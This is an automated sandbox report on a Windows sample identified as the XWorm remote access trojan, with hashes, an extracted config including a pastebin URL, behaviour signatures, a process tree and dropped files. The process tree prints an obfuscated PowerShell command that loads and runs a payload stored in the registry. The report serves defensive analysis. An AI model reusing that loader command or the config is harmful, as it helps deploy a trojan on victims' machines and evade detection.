Overview

overview

10

Static

static

3

2HAX8_DeadPayload.exe

windows7-x64

10

2HAX8_DeadPayload.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    31/10/2024, 08:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2HAX8_DeadPayload.exe

  • Size

    500KB

  • MD5

    b315d6de4d0834723914982447aab54f

  • SHA1

    f1b3b51e74e1f24faecf0524e7bbffe54feffe2e

  • SHA256

    75636b480a5d5c94fde4c189286ea07a3c12194de8ee8bb18cd462d3ae019f2b

  • SHA512

    b9afa7e84d33513e2255b24842847a9c25fc041b0d8e361836b4c2fd3787fba5b9a06c7633f1bb9b61ca56c650ddccd992a533b64f71105b6c36b69c648382ee

  • SSDEEP

    12288:s3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sdzO:mkGTy

Score
10/10
xwormdiscoveryevasionexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

QgVg78qW15uIsQ4H

Attributes
  • Install_directory

    %Public%

  • install_file

    ohh.exe

  • pastebin_url

    https://pastebin.com/raw/J09JweeH

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
    evasion
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Executes dropped EXE 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 43 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:420
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{0efa0dc4-e9f0-4b1b-b204-893c38208aa1}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1928
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:464
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:596
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe
              3⤵
                PID:1692
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                3⤵
                  PID:796
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k RPCSS
                2⤵
                  PID:672
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                  2⤵
                  • Modifies security service
                  PID:752
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                  2⤵
                    PID:816
                    • C:\Windows\system32\Dwm.exe
                      "C:\Windows\system32\Dwm.exe"
                      3⤵
                        PID:1308
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs
                      2⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:860
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {D4668F3E-99B5-4463-99FD-2C97CA00263F} S-1-5-18:NT AUTHORITY\System:Service:
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2648
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](68)+'e'+[Char](97)+''+[Char](100)+'s'+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                          4⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2756
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService
                      2⤵
                        PID:1000
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkService
                        2⤵
                          PID:300
                        • C:\Windows\System32\spoolsv.exe
                          C:\Windows\System32\spoolsv.exe
                          2⤵
                            PID:272
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                            2⤵
                              PID:1040
                            • C:\Windows\system32\taskhost.exe
                              "taskhost.exe"
                              2⤵
                                PID:1220
                              • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                2⤵
                                  PID:1500
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                  2⤵
                                    PID:1916
                                  • C:\Windows\system32\sppsvc.exe
                                    C:\Windows\system32\sppsvc.exe
                                    2⤵
                                      PID:668
                                  • C:\Windows\system32\lsass.exe
                                    C:\Windows\system32\lsass.exe
                                    1⤵
                                      PID:480
                                    • C:\Windows\system32\lsm.exe
                                      C:\Windows\system32\lsm.exe
                                      1⤵
                                        PID:488
                                      • C:\Windows\Explorer.EXE
                                        C:\Windows\Explorer.EXE
                                        1⤵
                                          PID:1352
                                          • C:\Users\Admin\AppData\Local\Temp\2HAX8_DeadPayload.exe
                                            "C:\Users\Admin\AppData\Local\Temp\2HAX8_DeadPayload.exe"
                                            2⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2860
                                            • C:\Users\Public\DeadMan.exe
                                              "C:\Users\Public\DeadMan.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2840
                                            • C:\Users\Public\DeadRoot.exe
                                              "C:\Users\Public\DeadRoot.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:2804
                                        • C:\Windows\system32\conhost.exe
                                          \??\C:\Windows\system32\conhost.exe "15690388731834236358-983697056-20795912691860625003-1934699749-1464440155-1911295987"
                                          1⤵
                                            PID:2144

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Public\DeadMan.exe
                                            Filesize

                                            34KB

                                            MD5

                                            86596f8f255ec89d279b0824435e99ad

                                            SHA1

                                            828d881cd4e693004ef8285aec99ef741b7f12ea

                                            SHA256

                                            be04723ba31eb34aafe705d2ae69a8b76cd717f3d378c49eee960a86112b7a58

                                            SHA512

                                            ed8429cf751326a5b646e35c59c61b2b3a0fdd7179f6a9a33e0bc70526dd96a72e02c2456d480cb26a8c0cd5f641842a73073bd2dc246d038d3642cec14f4672

                                            Download Submit

                                          • C:\Users\Public\DeadRoot.exe
                                            Filesize

                                            151KB

                                            MD5

                                            b8479a23c22cf6fc456e197939284069

                                            SHA1

                                            b2d98cc291f16192a46f363d007e012d45c63300

                                            SHA256

                                            18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f

                                            SHA512

                                            786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4

                                            Download Submit

                                          • memory/420-34-0x0000000000980000-0x00000000009A7000-memory.dmp

                                            Filesize

                                            156KB

                                            Download

                                          • memory/420-32-0x0000000000830000-0x0000000000852000-memory.dmp

                                            Filesize

                                            136KB

                                            Download

                                          • memory/420-33-0x0000000000980000-0x00000000009A7000-memory.dmp

                                            Filesize

                                            156KB

                                            Download

                                          • memory/420-30-0x0000000000830000-0x0000000000852000-memory.dmp

                                            Filesize

                                            136KB

                                            Download

                                          • memory/420-40-0x0000000000980000-0x00000000009A7000-memory.dmp

                                            Filesize

                                            156KB

                                            Download

                                          • memory/420-41-0x000007FEBEF30000-0x000007FEBEF40000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/420-42-0x0000000037C10000-0x0000000037C20000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/464-56-0x0000000037C10000-0x0000000037C20000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/464-48-0x0000000000230000-0x0000000000257000-memory.dmp

                                            Filesize

                                            156KB

                                            Download

                                          • memory/464-54-0x0000000000230000-0x0000000000257000-memory.dmp

                                            Filesize

                                            156KB

                                            Download

                                          • memory/464-55-0x000007FEBEF30000-0x000007FEBEF40000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/480-62-0x00000000009D0000-0x00000000009F7000-memory.dmp

                                            Filesize

                                            156KB

                                            Download

                                          • memory/480-70-0x0000000037C10000-0x0000000037C20000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/480-69-0x000007FEBEF30000-0x000007FEBEF40000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/480-68-0x00000000009D0000-0x00000000009F7000-memory.dmp

                                            Filesize

                                            156KB

                                            Download

                                          • memory/596-79-0x0000000000730000-0x0000000000757000-memory.dmp

                                            Filesize

                                            156KB

                                            Download

                                          • memory/1928-27-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/1928-20-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/1928-21-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/1928-22-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/1928-24-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/1928-25-0x0000000077BD0000-0x0000000077D79000-memory.dmp

                                            Filesize

                                            1.7MB

                                            Download

                                          • memory/1928-19-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/1928-26-0x00000000779B0000-0x0000000077ACF000-memory.dmp

                                            Filesize

                                            1.1MB

                                            Download

                                          • memory/2756-16-0x0000000001010000-0x0000000001038000-memory.dmp

                                            Filesize

                                            160KB

                                            Download

                                          • memory/2756-14-0x0000000019B40000-0x0000000019E22000-memory.dmp

                                            Filesize

                                            2.9MB

                                            Download

                                          • memory/2756-15-0x00000000009B0000-0x00000000009B8000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/2756-18-0x00000000779B0000-0x0000000077ACF000-memory.dmp

                                            Filesize

                                            1.1MB

                                            Download

                                          • memory/2756-17-0x0000000077BD0000-0x0000000077D79000-memory.dmp

                                            Filesize

                                            1.7MB

                                            Download

                                          • memory/2840-9-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

                                            Filesize

                                            9.9MB

                                            Download

                                          • memory/2840-8-0x0000000001120000-0x000000000112E000-memory.dmp

                                            Filesize

                                            56KB

                                            Download

                                          • memory/2840-188-0x000007FEF5A50000-0x000007FEF643C000-memory.dmp

                                            Filesize

                                            9.9MB

                                            Download

                                          • memory/2860-1-0x0000000000870000-0x00000000008F4000-memory.dmp

                                            Filesize

                                            528KB

                                            Download

                                          • memory/2860-0-0x000007FEF5A53000-0x000007FEF5A54000-memory.dmp

                                            Filesize

                                            4KB

                                            Download